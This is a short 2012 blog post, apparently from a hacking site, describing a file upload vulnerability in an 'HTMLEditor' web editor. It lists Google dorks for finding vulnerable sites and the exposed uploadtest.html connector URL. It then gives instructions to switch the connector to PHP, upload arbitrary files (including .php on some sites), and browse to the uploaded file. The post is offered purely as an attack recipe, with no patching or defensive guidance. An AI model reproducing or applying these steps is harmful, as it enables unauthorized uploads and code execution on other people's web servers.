Banner 468 x 60px

LikeViews

Thursday, 26 January 2012

HTML Editor File Upload Vulnerability

Comments
Google Dork:
inurl:/HTMLEditor/editor/ 
or 

"inurl:/HTMLEditor/editor//filemanager/"
or
 "inurl:/HTMLEditor/editor//filemanager//connectors/"

Exploit: 
http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or  
http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Go here, http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html Change connectors into .php (Like FCKeditor) and upload your file


supported files: .txt and .jpg in some site you can upload .html and .php too

To view you file go-to: http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here 


Live Demo:  
 
Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS